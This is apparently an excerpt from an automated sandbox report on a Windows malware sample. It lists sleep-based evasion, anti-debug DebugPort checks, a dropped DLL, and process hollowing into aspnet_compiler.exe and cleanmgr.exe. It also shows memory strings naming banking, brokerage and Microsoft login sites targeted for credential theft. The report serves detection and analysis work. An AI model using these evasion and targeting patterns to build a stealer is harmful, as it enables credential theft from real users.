                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4787Jump to behavior
                    Source: C:\Windows\SysWOW64\cleanmgr.exeWindow / User API: threadDelayed 2708
                    Source: C:\Windows\SysWOW64\cleanmgr.exeWindow / User API: threadDelayed 7266
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 0.8 %
                    Source: C:\Windows\SysWOW64\cleanmgr.exeAPI coverage: 3.1 %
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep time: -23058430092136925s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep count: 7810 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep count: 1815 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep count: 1110 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep count: 305 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7328Thread sleep count: 5016 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7328Thread sleep count: 4787 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7404Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\cleanmgr.exe TID: 7560Thread sleep count: 2708 > 30
                    Source: C:\Windows\SysWOW64\cleanmgr.exe TID: 7560Thread sleep time: -5416000s >= -30000s
                    Source: C:\Windows\SysWOW64\cleanmgr.exe TID: 7560Thread sleep count: 7266 > 30
                    Source: C:\Windows\SysWOW64\cleanmgr.exe TID: 7560Thread sleep time: -14532000s >= -30000s
                    Source: C:\Windows\SysWOW64\cleanmgr.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\cleanmgr.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_02EAC3F0 FindFirstFileW,FindNextFileW,FindClose,15_2_02EAC3F0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: 441b1bVp.15.drBinary or memory string: dev.azure.comVMware20,11696497155j
                    Source: 441b1bVp.15.drBinary or memory string: global block list test formVMware20,11696497155
                    Source: powershell.exe, 00000003.00000002.1357523946.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: 441b1bVp.15.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                    Source: 441b1bVp.15.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                    Source: powershell.exe, 00000001.00000002.1474974184.0000000007BEE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1474974184.0000000007C18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: cleanmgr.exe, 0000000F.00000002.2567427488.000000000322B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
                    Source: 441b1bVp.15.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                    Source: 441b1bVp.15.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                    Source: 441b1bVp.15.drBinary or memory string: tasks.office.comVMware20,11696497155o
                    Source: powershell.exe, 00000001.00000002.1474974184.0000000007B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                    Source: powershell.exe, 00000003.00000002.1357523946.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: 441b1bVp.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                    Source: powershell.exe, 0000000A.00000002.1791210470.00000000074B0000.00000004.00000020.00020000.00000000.sdmp, TjxlUxenxgDChq.exe, 00000012.00000002.2572204141.0000000000D2F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2134785185.000001BF20C9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: 441b1bVp.15.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                    Source: 441b1bVp.15.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                    Source: 441b1bVp.15.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                    Source: 441b1bVp.15.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                    Source: 441b1bVp.15.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                    Source: 441b1bVp.15.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                    Source: 441b1bVp.15.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                    Source: 441b1bVp.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                    Source: 441b1bVp.15.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                    Source: wscript.exe, 00000007.00000003.1446954427.00000000056C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: 441b1bVp.15.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                    Source: powershell.exe, 00000003.00000002.1357523946.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: 441b1bVp.15.drBinary or memory string: AMC password management pageVMware20,11696497155
                    Source: 441b1bVp.15.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                    Source: 441b1bVp.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                    Source: 441b1bVp.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                    Source: 441b1bVp.15.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                    Source: 441b1bVp.15.drBinary or memory string: discord.comVMware20,11696497155f
                    Source: 441b1bVp.15.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                    Source: 441b1bVp.15.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                    Source: 441b1bVp.15.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                    Source: 441b1bVp.15.drBinary or memory string: outlook.office.comVMware20,11696497155s
                    Source: 441b1bVp.15.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                    Source: 441b1bVp.15.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                    Source: 441b1bVp.15.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPort
                    Source: C:\Windows\SysWOW64\cleanmgr.exeProcess queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0118D1C0 rdtsc 13_2_0118D1C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004175D3 LdrLoadDll,13_2_004175D3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011BA118 mov ecx, dword ptr fs:[00000030h]13_2_011BA118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011BA118 mov eax, dword ptr fs:[00000030h]13_2_011BA118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011BA118 mov eax, dword ptr fs:[00000030h]13_2_011BA118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011BA118 mov eax, dword ptr fs:[00000030h]13_2_011BA118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011D0115 mov eax, dword ptr fs:[00000030h]13_2_011D0115
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01111131 mov eax, dword ptr fs:[00000030h]13_2_01111131
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01111131 mov eax, dword ptr fs:[00000030h]13_2_01111131
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110B136 mov eax, dword ptr fs:[00000030h]13_2_0110B136
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110B136 mov eax, dword ptr fs:[00000030h]13_2_0110B136
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110B136 mov eax, dword ptr fs:[00000030h]13_2_0110B136
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110B136 mov eax, dword ptr fs:[00000030h]13_2_0110B136
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01140124 mov eax, dword ptr fs:[00000030h]13_2_01140124
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011A8158 mov eax, dword ptr fs:[00000030h]13_2_011A8158
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01117152 mov eax, dword ptr fs:[00000030h]13_2_01117152
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01116154 mov eax, dword ptr fs:[00000030h]13_2_01116154
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01116154 mov eax, dword ptr fs:[00000030h]13_2_01116154
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110C156 mov eax, dword ptr fs:[00000030h]13_2_0110C156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011E5152 mov eax, dword ptr fs:[00000030h]13_2_011E5152
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01109148 mov eax, dword ptr fs:[00000030h]13_2_01109148
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01109148 mov eax, dword ptr fs:[00000030h]13_2_01109148
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01109148 mov eax, dword ptr fs:[00000030h]13_2_01109148
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01109148 mov eax, dword ptr fs:[00000030h]13_2_01109148
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011A4144 mov eax, dword ptr fs:[00000030h]13_2_011A4144
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011A4144 mov eax, dword ptr fs:[00000030h]13_2_011A4144
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011A4144 mov ecx, dword ptr fs:[00000030h]13_2_011A4144
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011A4144 mov eax, dword ptr fs:[00000030h]13_2_011A4144
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011A4144 mov eax, dword ptr fs:[00000030h]13_2_011A4144
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F172 mov eax, dword ptr fs:[00000030h]13_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011A9179 mov eax, dword ptr fs:[00000030h]13_2_011A9179
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0119019F mov eax, dword ptr fs:[00000030h]13_2_0119019F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0119019F mov eax, dword ptr fs:[00000030h]13_2_0119019F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0119019F mov eax, dword ptr fs:[00000030h]13_2_0119019F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0119019F mov eax, dword ptr fs:[00000030h]13_2_0119019F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01167190 mov eax, dword ptr fs:[00000030h]13_2_01167190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110A197 mov eax, dword ptr fs:[00000030h]13_2_0110A197
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110A197 mov eax, dword ptr fs:[00000030h]13_2_0110A197
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110A197 mov eax, dword ptr fs:[00000030h]13_2_0110A197
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01150185 mov eax, dword ptr fs:[00000030h]13_2_01150185
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011CC188 mov eax, dword ptr fs:[00000030h]13_2_011CC188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011CC188 mov eax, dword ptr fs:[00000030h]13_2_011CC188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0112B1B0 mov eax, dword ptr fs:[00000030h]13_2_0112B1B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011C11A4 mov eax, dword ptr fs:[00000030h]13_2_011C11A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011C11A4 mov eax, dword ptr fs:[00000030h]13_2_011C11A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011C11A4 mov eax, dword ptr fs:[00000030h]13_2_011C11A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011C11A4 mov eax, dword ptr fs:[00000030h]13_2_011C11A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0114D1D0 mov eax, dword ptr fs:[00000030h]13_2_0114D1D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0114D1D0 mov ecx, dword ptr fs:[00000030h]13_2_0114D1D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0118E1D0 mov eax, dword ptr fs:[00000030h]13_2_0118E1D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0118E1D0 mov eax, dword ptr fs:[00000030h]13_2_0118E1D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0118E1D0 mov ecx, dword ptr fs:[00000030h]13_2_0118E1D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0118E1D0 mov eax, dword ptr fs:[00000030h]13_2_0118E1D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0118E1D0 mov eax, dword ptr fs:[00000030h]13_2_0118E1D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011E51CB mov eax, dword ptr fs:[00000030h]13_2_011E51CB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011D61C3 mov eax, dword ptr fs:[00000030h]13_2_011D61C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011D61C3 mov eax, dword ptr fs:[00000030h]13_2_011D61C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011B71F9 mov esi, dword ptr fs:[00000030h]13_2_011B71F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011401F8 mov eax, dword ptr fs:[00000030h]13_2_011401F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011E61E5 mov eax, dword ptr fs:[00000030h]13_2_011E61E5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011351EF mov eax, dword ptr fs:[00000030h]13_2_011351EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011351EF mov eax, dword ptr fs:[00000030h]13_2_011351EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011351EF mov eax, dword ptr fs:[00000030h]13_2_011351EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011351EF mov eax, dword ptr fs:[00000030h]13_2_011351EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011351EF mov eax, dword ptr fs:[00000030h]13_2_011351EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011351EF mov eax, dword ptr fs:[00000030h]13_2_011351EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011351EF mov eax, dword ptr fs:[00000030h]13_2_011351EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011351EF mov eax, dword ptr fs:[00000030h]13_2_011351EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011351EF mov eax, dword ptr fs:[00000030h]13_2_011351EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011351EF mov eax, dword ptr fs:[00000030h]13_2_011351EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011351EF mov eax, dword ptr fs:[00000030h]13_2_011351EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011351EF mov eax, dword ptr fs:[00000030h]13_2_011351EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011351EF mov eax, dword ptr fs:[00000030h]13_2_011351EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011151ED mov eax, dword ptr fs:[00000030h]13_2_011151ED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0112E016 mov eax, dword ptr fs:[00000030h]13_2_0112E016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0112E016 mov eax, dword ptr fs:[00000030h]13_2_0112E016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0112E016 mov eax, dword ptr fs:[00000030h]13_2_0112E016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0112E016 mov eax, dword ptr fs:[00000030h]13_2_0112E016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01194000 mov ecx, dword ptr fs:[00000030h]13_2_01194000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011D903E mov eax, dword ptr fs:[00000030h]13_2_011D903E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011D903E mov eax, dword ptr fs:[00000030h]13_2_011D903E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011D903E mov eax, dword ptr fs:[00000030h]13_2_011D903E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011D903E mov eax, dword ptr fs:[00000030h]13_2_011D903E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110A020 mov eax, dword ptr fs:[00000030h]13_2_0110A020
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110C020 mov eax, dword ptr fs:[00000030h]13_2_0110C020
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01112050 mov eax, dword ptr fs:[00000030h]13_2_01112050
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0113B052 mov eax, dword ptr fs:[00000030h]13_2_0113B052
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011B705E mov ebx, dword ptr fs:[00000030h]13_2_011B705E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011B705E mov eax, dword ptr fs:[00000030h]13_2_011B705E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01196050 mov eax, dword ptr fs:[00000030h]13_2_01196050
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0113C073 mov eax, dword ptr fs:[00000030h]13_2_0113C073
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01121070 mov eax, dword ptr fs:[00000030h]13_2_01121070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01121070 mov ecx, dword ptr fs:[00000030h]13_2_01121070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01121070 mov eax, dword ptr fs:[00000030h]13_2_01121070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01121070 mov eax, dword ptr fs:[00000030h]13_2_01121070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01121070 mov eax, dword ptr fs:[00000030h]13_2_01121070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01121070 mov eax, dword ptr fs:[00000030h]13_2_01121070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01121070 mov eax, dword ptr fs:[00000030h]13_2_01121070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01121070 mov eax, dword ptr fs:[00000030h]13_2_01121070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01121070 mov eax, dword ptr fs:[00000030h]13_2_01121070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01121070 mov eax, dword ptr fs:[00000030h]13_2_01121070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01121070 mov eax, dword ptr fs:[00000030h]13_2_01121070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01121070 mov eax, dword ptr fs:[00000030h]13_2_01121070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01121070 mov eax, dword ptr fs:[00000030h]13_2_01121070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0118D070 mov ecx, dword ptr fs:[00000030h]13_2_0118D070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0119106E mov eax, dword ptr fs:[00000030h]13_2_0119106E
